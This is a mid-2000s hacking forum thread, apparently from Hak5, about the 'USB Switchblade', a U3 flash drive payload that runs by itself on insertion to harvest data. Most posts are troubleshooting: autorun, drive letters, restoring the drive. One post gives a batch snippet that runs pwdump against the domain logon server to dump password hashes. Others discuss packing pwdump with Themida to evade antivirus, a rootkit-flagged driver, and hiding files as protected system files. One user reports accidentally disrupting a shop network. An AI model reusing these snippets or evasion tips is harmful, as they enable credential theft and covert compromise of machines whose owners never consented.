G-Stress Posted November 1, 2006 Share Posted November 1, 2006 @ msoule xXxellent :D I knew somebody else out there would find a way. Now if only I can make RDP stealth thanks man. Quote Link to comment Share on other sites More sharing options...
Matrix61312 Posted November 2, 2006 Share Posted November 2, 2006 Hey, does anybody know where I can download an OSX version of the U3 loader for a SanDisk flash drive? Quote Link to comment Share on other sites More sharing options...
tonyintn Posted November 10, 2006 Share Posted November 10, 2006 New here and have been reading the posts but cant find an anwser to a question that was asked eariler in this forum Question: I am interested in trying the payload but would like to know if I try one of the pay loads can I load my U3 options back if I chose to go back to the original setting for my U3 drive? Thanks Quote Link to comment Share on other sites More sharing options...
SomeoneE1se Posted November 10, 2006 Share Posted November 10, 2006 I THINK THINK all of them just backup the drive before you start and when you want to change the drive back to normal U3 just replace the backup you made and delete the launchpad .iso file and run the updater again and it should update from the internet but I might be wrong about this and you should get a second opinion Quote Link to comment Share on other sites More sharing options...
renegadecanuck Posted November 10, 2006 Share Posted November 10, 2006 Yes, SomeoneElse, that is correct. I've swapped between U3 and Payload many times now (mostly in my attempt to create U3 compatible loaders and the like) Quote Link to comment Share on other sites More sharing options...
tonyintn Posted November 10, 2006 Share Posted November 10, 2006 cool thanks Quote Link to comment Share on other sites More sharing options...
Shiva Posted November 11, 2006 Share Posted November 11, 2006 Nod32 with updated Av signatures, detects amish's Payload :? Quote Link to comment Share on other sites More sharing options...
msoule Posted November 22, 2006 Share Posted November 22, 2006 A few of you may find this handy. I made this little routine for the end of my batch file. It time and date stamps the log file. I had to tinker around with a few other aspects of the original go.cmd file in order to get it to work right. If you have issues let me know and I'll post my whole bat. if not exist documentslogfilestemp md documentslogfilestemp move Documentslogfiles%computername%_load.log Documentslogfilestemp FOR /F "usebackq tokens=1" %%n IN (`dir Documentslogfilestemp /b`) DO @FOR /F "usebackq tokens=2,3,4 delims=/ " %%d IN (`date /t`) DO @FOR /F "usebackq tokens=1,2 delims=: " %%t IN (`time /t`) DO @ren Documentslogfilestemp%%n %computername%-%%d%%e%%f-%%t%%u.log move Documentslogfilestemp* Documentslogfiles rd Documentslogfilestemp Quote Link to comment Share on other sites More sharing options...
msoule Posted November 22, 2006 Share Posted November 22, 2006 Here's another little mod. Not too glamorous but handy. This will check to see if the user is logged on to a domain server. If so, pwdump will run against the logonserver and dump the PWs from there. This will ONLY work if the logged on user has DomainAdmin rights. If the user does not have these right the attempt will fail and WILL generate an event in the Security Log of the server. Also, I recommend using PWDump6 to avoid LSASS errors on the server. I have had LSASS crashes in my lab with previous PWDump versions but never with v6. Use with care. @echo ==================================================[Dump Server SAM] >> Documentslogfiles%computername%_load.log 2>&1 @if not %LOGONSERVER%==%COMPUTERNAME% .pwdump %LOGONSERVER%  >> Documentslogfiles%computername%_load.log 2>&1 @if %LOGONSERVER%==%COMPUTERNAME% @echo Logged on to local machine.  Process skipped. >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[Dump END Server SAM] >> Documentslogfiles%computername%_load.log 2>&1 Quote Link to comment Share on other sites More sharing options...
secret_squirrel Posted November 23, 2006 Share Posted November 23, 2006 just setup the max damage version. works great!! i get an error asking me to report the problem to somewhere@oreans.com I expect it is a pwdump error. anyone else get this? Quote Link to comment Share on other sites More sharing options...
moonlit Posted November 23, 2006 Share Posted November 23, 2006 Uh... Oreans, eh? Funny... what's in that package? Quote Link to comment Share on other sites More sharing options...
secret_squirrel Posted November 23, 2006 Share Posted November 23, 2006 Themida / Orean technologies Maybe this is what was used to goof the file sigs for pwdump. I am running the encrypted version of the site. I cant recall the the authors name, sorry. It only happens on the testtop. I am currently tweaking the payload for assesment purposes. I plan to have a second set of files to reverse everything left by Switchblade. Maybe a second usb stick in the future..... One to expolit and one to clean up the mess...... Red or Blue pill? :) If I come up with anything interesting i will be sure to share. great site!!!!! Plenty of projects to play with here ;) 8) Quote Link to comment Share on other sites More sharing options...
ChevronX Posted November 30, 2006 Share Posted November 30, 2006 Just to let you guys know, I was a noob and plugged in my drive at work, without thinking (As I usually use Windows XP and it asks if you want to open the folder, as its non-u3) and it was a Windows 2000 machine, switchblade ran automaticlly and folding@home slowed the network down to a crawl, we spent days even after running the antidote trying to fix it, and since it was a computer shop, netcafe it didnt go down well, so just letting you guys know. Quote Link to comment Share on other sites More sharing options...
likeachild Posted December 21, 2006 Share Posted December 21, 2006 I installed the maxdamage payload, but trendmicro is detecting a Trojan.Rootkit when it runs. %windir%/system32/oreans.sys anybody else get this? Quote Link to comment Share on other sites More sharing options...
majk Posted December 21, 2006 Share Posted December 21, 2006 I installed the maxdamage payload, but trendmicro is detecting a Trojan.Rootkit when it runs. %windir%/system32/oreans.sysanybody else get this? As mentioned above Themida, which uses the oreans.sys file, is what is used to make pwdump get past anti-virus programs. There are other crypters for files that don't rely on external dll:s like that but eventually these things get detected by the anti-virus vendors.http://www.oreans.com/ Quote Link to comment Share on other sites More sharing options...
tester134 Posted January 11, 2007 Share Posted January 11, 2007 Hey everyone, this is my first post here. I just got a U3 Kingston drive, and I'm trying to run the Max Damage technique. On the Wiki it says that if I don't have a SanDisk or Memorex U3 drive, I need to download the U3 LaunchPad Hacker. I tried to download it but the link was broken. What should I do? Can someone please help me? Thanks a lot guyz. Quote Link to comment Share on other sites More sharing options...
twist3r Posted January 28, 2007 Share Posted January 28, 2007 on my switchblade on about 1/2 the computers I plug it into I get a "drive not found/detected or similar error with a continue retry cancel option. I have this error on both the vbs based u3 launcher and the batch file based launcher (the one that is on cd partition and searches for the usb partition) any ideas why this is? it's not very anonymous when it does that. Quote Link to comment Share on other sites More sharing options...
twist3r Posted January 31, 2007 Share Posted January 31, 2007 ^ it appears that what is happening is that the cdrom partition of u3 takes the first available drive letter (G in this case) while the flash partition tries to take the next letter (H). However in the network I'm on, there is an H drive already there! Going into the management console -> disc manager I can locate the flash partition and give it a different drive letter, but this defeats the automation!! is there a way to get the flash drive to just take the next available letter and not try to force the next letter from the cdrom? Quote Link to comment Share on other sites More sharing options...
advanced Posted February 1, 2007 Share Posted February 1, 2007 Same problem happens for me as it does for twist3r. The CDROM portion shows up, but the flash drive isn't available unless settings are changed. Any ideas on how to change the letter assignment automatically? (It's a U3 problem). One other thing that's half related: How do you make files not just "hidden", but into "protected operating system files"? That way, it's a little harder to make any of them visible, and they still run. I've managed to make folders that are protected by copying the RECYCLER folder, but I'm not sure how to change that on individual files. Any help? Quote Link to comment Share on other sites More sharing options...
twist3r Posted February 1, 2007 Share Posted February 1, 2007 @advanced I use http://www.febooti.com/products/filetweak/ to change the file attributes to system files ! yes resolving the drive letter problem is becoming very important to me! Even for regular u3 drives my school computers mess them up, this is becoming a growing problem! Quote Link to comment Share on other sites More sharing options...
CyberSpike Posted February 7, 2007 Share Posted February 7, 2007 I'm using the 2GB memorex minitravel drive, is there anyway to back up the memorex u3 launchpad so I can use it normally again after installing switchblade? Quote Link to comment Share on other sites More sharing options...
n00berster Posted February 22, 2007 Share Posted February 22, 2007 Hey, I'm having problems with the maxdamage switchblade. It doesnt seem to autorun, it works fine if i manually click on go.vbe, but I cant get it to run automatically. Can anybody tell me how to fix this? Quote Link to comment Share on other sites More sharing options...
Sergius Posted March 9, 2007 Share Posted March 9, 2007 0_0 Quote Link to comment Share on other sites More sharing options...
Obi-Wahn Posted May 2, 2007 Share Posted May 2, 2007 Hey. I've bought a 4 Gig Toshiba U3 drive. I've wanted to try Switchblade but it seems, that the HAK5 wiki is down?!? So maybe anyone could upload a zip Package on a filehoster or PM me for email? Thx Obi-Wahn Quote Link to comment Share on other sites More sharing options...
manimal Posted May 6, 2007 Share Posted May 6, 2007 yea, I'm hoping it comes back soon too.. I want to try this out.. I like what the latest episode has for USB trickery (2x10), going to rewatch it tonight at work when things get quiet.. on a side note, has anyone heard anything about this little device? http://www.subrosasoft.com/OSXSoftware/ind...products_id=195 (probably a dumb question).. now I haven't read through the 25 pages of this thread yet, so I apologize for a repost, but I'm curious as to how similar/different it is from the ongoing project here.. perhaps a future implementation into this project? EDIT - I went on google, and found this link.. its reference is HAK5, and has all the USB hacks on it.. here's the one for the switchblade http://www.usbhacks.com/2006/10/07/usb-switchblade/ edit #2 - so the loader works, and the iso work, but they don't include the payload for the regular partition of the drive.. so I guess I'll have to keep waiting.. I don't know how to use the code .. such a n00b... Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.